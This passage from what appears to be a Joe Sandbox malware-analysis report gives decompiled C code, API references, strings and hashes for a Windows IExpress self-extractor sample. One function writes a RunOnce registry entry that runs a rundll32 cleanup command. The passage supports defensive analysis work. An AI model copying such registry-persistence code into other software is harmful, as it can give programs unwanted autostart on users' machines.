										E003844B9(0, 0x54b, "lega", 0, 0x10, 0);
										L11:
										CloseHandle( *0x388588);
										 *0x389124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x389124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00386CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00382cb5
0x00382cbc
0x00382cc7
0x00382cc9
0x00382cd1
0x00382cd3
0x00382cd9
0x00382ce9
0x00382cf9
0x00382d0e
0x00382d15
0x00382d1c
0x00382ef3
0x00000000
0x00382d2d
0x00382d34
0x00382d3b
0x00382d40
0x00382d48
0x00382d59
0x00382d84
0x00382e1f
0x00382e1f
0x00382e2e
0x00382e41
0x00382e5a
0x00382e62
0x00382e6c
0x00382e6c
0x00382e75
0x00382e77
0x00382e77
0x00382e84
0x00382e8b
0x00382e94
0x00000000
0x00382e96
0x00382e96
0x00382e9e
0x00382ea2
0x00382eba
0x00000000
0x00382ece
0x00382ede
0x00382eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00382eed
0x00382eef
0x00382eef
0x00382eef
0x00382eef
0x00382ea2
0x00382e86
0x00382e88
0x00382e88
0x00382e43
0x00382e48
0x00000000
0x00382e48
0x00382e30
0x00382e30
0x00382ef8
0x00382f01
0x00000000
0x00382f01
0x00382d8a
0x00382d8f
0x00382da1
0x00000000
0x00382da3
0x00382dae
0x00382db4
0x00382dbb
0x00000000
0x00382dca
0x00382dd3
0x00382df5
0x00382e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00382dd5
0x00382dde
0x00382de3
0x00382e04
0x00382e0a
0x00382e10
0x00000000
0x00382e10
0x00382dd3
0x00382dbb
0x00382da1
0x00382d5b
0x00382d5b
0x00382d5d
0x00382d69
0x00382d6e
0x00382f06
0x00382f06
0x00382f06
0x00382d59
0x00382f18

APIs

memset.MSVCRT ref: 00382CD9
memset.MSVCRT ref: 00382CE9
memset.MSVCRT ref: 00382CF9

Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00382D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00382D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00382DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00382DBD
CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00382E0A

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Strings

INSTANCECHECK, xrefs: 00382D95
lega, xrefs: 00382D04, 00382DD9, 00382DF0
TITLE, xrefs: 00382D09
VERCHECK, xrefs: 00382E54
EXTRACTOPT, xrefs: 00382D4D

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
API String ID: 1002816675-2051202908
Opcode ID: 87b12e20ad9bd03cf078919cb7a7580653dc0cb3f9cef7e909436f954e8033a1
Instruction ID: f92267403ca52eb64a172993e9dc6465873820912380e357000c280c2cf7390c
Opcode Fuzzy Hash: 87b12e20ad9bd03cf078919cb7a7580653dc0cb3f9cef7e909436f954e8033a1
Instruction Fuzzy Hash: 1B512670340301ABEB27BB708C4AB7B369DEB85700F5444EAFA42DA5D1EBB89C41C725

Uniqueness

Uniqueness Score: -1.00%

Function 003834F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E003834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x3891d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x388584 = _t35;
					E003843D0(_t35, GetDesktopWindow());
					__eflags =  *0x388184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lega");
					_t17 = CreateThread(0, 0, E00384FE0, 0, 0, 0x388798);
					 *0x38879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E003844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x38858c);
					_t38 =  *0x388584; // 0x0
					_t25 = E003844B9(_t38, 0x4b2, 0x381140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x3891d8 = 1;
						SetEvent( *0x38858c);
						_t39 =  *0x38879c; // 0x0
						E00383680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x38858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x38879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x003834fb
0x003834fe
0x00383665
0x00383666
0x00383666
0x00383668
0x0038366e
0x0038366e
0x00383671
0x00383671
0x00383677
0x00000000
0x00383677
0x00383504
0x00383506
0x00383507
0x0038350c
0x0038365b
0x0038365f
0x00000000
0x00000000
0x00000000
0x00383661
0x00383512
0x00383515
0x003835be
0x003835c1
0x003835d1
0x003835d8
0x003835de
0x003835f8
0x00383617
0x00383617
0x00383623
0x00383637
0x0038363d
0x00383642
0x00383644
0x00000000
0x00383646
0x00383652
0x00383657
0x00383658
0x00000000
0x00383658
0x00383644
0x0038351b
0x0038351d
0x0038354f
0x00383553
0x00000000
0x00000000
0x0038355f
0x00383565
0x0038357c
0x00383581
0x00383584
0x0038359b
0x003835a1
0x003835a7
0x003835ad
0x003835b3
0x003835b8
0x00000000
0x003835b8
0x00383586
0x00383588
0x00000000
0x00000000
0x00383590
0x00000000
0x00383590
0x00383524
0x00383535
0x00383541
0x00000000
0x00383549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00383535
EndDialog.USER32(?,?), ref: 00383541
ResetEvent.KERNEL32 ref: 0038355F
SetEvent.KERNEL32(00381140,00000000,00000020,00000004), ref: 00383590
GetDesktopWindow.USER32 ref: 003835C7
GetDlgItem.USER32(?,0000083B), ref: 003835F1
SendMessageA.USER32(00000000), ref: 003835F8
GetDlgItem.USER32(?,0000083B), ref: 00383610
SendMessageA.USER32(00000000), ref: 00383617
SetWindowTextA.USER32(?,lega), ref: 00383623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00388798), ref: 00383637
EndDialog.USER32(?,00000000), ref: 00383671

Strings

lega, xrefs: 0038361D

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lega
API String ID: 2406144884-245445314
Opcode ID: b3f89f45dc399bb88a81f4bc90046f3e0fecec27fded8aefa776a484f058c3b9
Instruction ID: 013eaf4ab63572d437a1c66fc9a8b77852608a476c5ec6bd8aeee738abe4dd92
Opcode Fuzzy Hash: b3f89f45dc399bb88a81f4bc90046f3e0fecec27fded8aefa776a484f058c3b9
Instruction Fuzzy Hash: 1631B330240301BBEB237F29EC8DE2B3A6CE786F11F5449DAF602953A0DB758A00DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00384224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00384224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E003844B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x3888c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x3887a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x388598;
					_v36 = 1;
					_v32 = E00384200;
					_v28 = 0x3888c0;
					 *0x38a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x38a288(_t32, 0x3888c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x3888c0 != 0) {
							E00381680(0x3887a0, 0x104, 0x3888c0);
						}
						 *0x38a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x3887a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x3888c0);
					_t61 = 0x3888c0;
					_t4 =  &(_t61[1]); // 0x3888c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x3888c0; // 0x711181
					_t44 = CharPrevA(0x3888c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x3888c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00384234
0x0038423c
0x00384240
0x003843b2
0x003843b7
0x003843c0
0x00000000
0x003843c5
0x0038424c
0x00384252
0x00384257
0x003843a4
0x003843a5
0x003843ab
0x00000000
0x003843ab
0x00384263
0x00384269
0x0038426e
0x00000000
0x00000000
0x0038427a
0x00384280
0x00384285
0x00000000
0x00000000
0x0038428d
0x00384293
0x003842e6
0x003842e9
0x003842ef
0x003842f4
0x003842f7
0x00384300
0x00384307
0x0038430e
0x00384315
0x0038431c
0x00384322
0x00384326
0x0038432d
0x0038432d
0x0038432f
0x00384334
0x00384343
0x00384349
0x0038434d
0x00384354
0x00384354
0x0038435d
0x0038436e
0x0038436e
0x0038437d
0x00384383
0x00384387
0x0038438e
0x0038438e
0x00384387
0x00384391
0x00384399
0x00000000
0x00384295
0x0038429f
0x003842a5
0x003842aa
0x003842aa
0x003842ad
0x003842ad
0x003842af
0x003842b0
0x003842b6
0x003842c2
0x003842c8
0x003842ce
0x003842e4
0x003842e4
0x00000000
0x003842ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00384236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0038424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00384263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0038427A
GetTempPathA.KERNEL32(00000104,003888C0,?,00000001), ref: 0038429F
CharPrevA.USER32(003888C0,00711181,?,00000001), ref: 003842C2
CharPrevA.USER32(003888C0,00000000,?,00000001), ref: 003842D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00384391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003843A5

Strings

SHELL32.DLL, xrefs: 0038422F
SHGetPathFromIDList, xrefs: 00384274
SHBrowseForFolder, xrefs: 00384246

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 270d83a19019c43ea74e3fb2719021d4163eab9281430bea1114f7297d709241
Instruction ID: 6bbb2d49e45f467b061fc4afb202139b97448f8d7dbf36d282d90bca30588ca6
Opcode Fuzzy Hash: 270d83a19019c43ea74e3fb2719021d4163eab9281430bea1114f7297d709241
Instruction Fuzzy Hash: 4C411A78A00305AFE713BF74DC88AAE7BB9EB49344F9505EAE941A7251CF758C01C761

Uniqueness

Uniqueness Score: -1.00%

Function 00382773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00382773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x388004; // 0xb25159a8
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00381781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0038658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0038658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x381140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00381680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00386CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00382773
0x0038277e
0x00382785
0x0038278a
0x0038278d
0x00382790
0x00382792
0x00382798
0x0038279d
0x003828b2
0x00000000
0x003827a3
0x003827a3
0x003827af
0x003827c2
0x003827c8
0x003827cd
0x003827d5
0x003828b7
0x003828b9
0x00000000
0x003827db
0x003827dd
0x003828aa
0x00000000
0x003827e3
0x003827e3
0x003827ec
0x003827f8
0x00382803
0x0038280b
0x00382831
0x003828c3
0x003828c9
0x003828cd
0x00382837
0x0038285a
0x0038285c
0x00382865
0x00382892
0x00382895
0x00000000
0x00000000
0x00382867
0x00382878
0x0038288c
0x00000000
0x0038287a
0x00382880
0x00382885
0x00382897
0x00382899
0x00382899
0x00382878
0x00382865
0x003828a0
0x003828bf
0x003828c1
0x00000000
0x00000000
0x003828c1
0x00382831
0x003827dd
0x003827d5
0x003828e5

APIs

CharUpperA.USER32(B25159A8,00000000,00000000,00000000), ref: 003827A8
CharNextA.USER32(0000054D), ref: 003827B5
CharNextA.USER32(00000000), ref: 003827BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382829
RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003828A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003828AA
GetSystemDirectoryA.KERNEL32 ref: 003828B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003827E4

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: ff7bd3184a40004c6bef5fbb2843e9f5361454fc668bb55525d72022ff239076
Instruction ID: 0201a409ccbbbe039e68f18ff176da5bcb765e4f872d5cdb6c71a4f8a814f22e
Opcode Fuzzy Hash: ff7bd3184a40004c6bef5fbb2843e9f5361454fc668bb55525d72022ff239076
Instruction Fuzzy Hash: F44175B190032CAFDF26AB649C45AEB77BDEB55700F1440EAF545D2110DB708E869FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00382267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00382267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x388004; // 0xb25159a8
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x388530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0038658A( &_v268, 0x104, 0x381140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
							E0038171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00386CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00382272
0x00382277
0x00382279
0x00382283
0x00382289
0x003822ab
0x003822b1
0x003822c4
0x003822e0
0x003822e6
0x003822f5
0x0038230d
0x0038231c
0x0038231c
0x00382321
0x0038233a
0x00382342
0x00382348
0x0038234b
0x0038234c
0x0038234c
0x0038234e
0x0038234f
0x0038236e
0x0038236e
0x0038237a
0x00382380
0x00382380
0x00382381
0x00382381
0x0038238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003822A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 003822D8
memset.MSVCRT ref: 003822F5
GetSystemDirectoryA.KERNEL32 ref: 00382305
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0038236E
RegCloseKey.ADVAPI32(?), ref: 0038237A

Strings

wextract_cleanup0, xrefs: 0038227C, 003822CD, 00382363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00382299
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0038232D
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00382321

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-2874043782
Opcode ID: 8d2e9cbbbab650e7a66144a766eea7f7f1b4a4859b87f93e3f1e557089f215ed
Instruction ID: 1a5d9a031643b3d9dfa99a2f8407a84b26b36bbb4da6555524b5ef9ce143d716
Opcode Fuzzy Hash: 8d2e9cbbbab650e7a66144a766eea7f7f1b4a4859b87f93e3f1e557089f215ed
Instruction Fuzzy Hash: 67319875A003186BDB23AB61DC49FEB777CEB55700F4401EAF90DAA051DA75AB88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00383100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00383100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x388590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x388590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E003843D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x388d4c);
					SetWindowTextA(_t33, "lega");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x3888b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E003830C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00383108
0x0038310b
0x003831b7
0x003831ca
0x003831d0
0x003831d0
0x003831da
0x00000000
0x003831da
0x00383111
0x00383114
0x00383136
0x00383136
0x00383138
0x0038313b
0x00383141
0x00000000
0x00383143
0x00383116
0x0038311b
0x0038314b
0x00383151
0x00383158
0x0038316a
0x00383176
0x0038317d
0x0038318b
0x0038319e
0x003831a3
0x00000000
0x003831ad
0x00383120
0x00000000
0x00000000
0x0038312a
0x00383134
0x00000000
0x00000000
0x00000000
0x00383134
0x0038312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0038313B
GetDesktopWindow.USER32 ref: 0038314B
SetDlgItemTextA.USER32(?,00000834), ref: 0038316A
SetWindowTextA.USER32(?,lega), ref: 00383176
SetForegroundWindow.USER32(?), ref: 0038317D
GetDlgItem.USER32(?,00000834), ref: 00383185
GetWindowLongA.USER32(00000000,000000FC), ref: 00383190
SetWindowLongA.USER32(00000000,000000FC,003830C0), ref: 003831A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003831CA

Strings

lega, xrefs: 00383170

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lega
API String ID: 3785188418-245445314
Opcode ID: a3d396435dc2ad8e921bd75bcbb44544a0cd5d1fa9ecc1daa048446d30392548
Instruction ID: e57d7d891ed8d122bf9e889e1af7bbeb7316cdeff92408bf7add5d8f46c77c57
Opcode Fuzzy Hash: a3d396435dc2ad8e921bd75bcbb44544a0cd5d1fa9ecc1daa048446d30392548
Instruction Fuzzy Hash: A211B131204711BBEB237F24AC0CBAA3A6CFB4AF20F110692F815916E0DBB49741D742

Uniqueness

Uniqueness Score: -1.00%

Function 0038468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

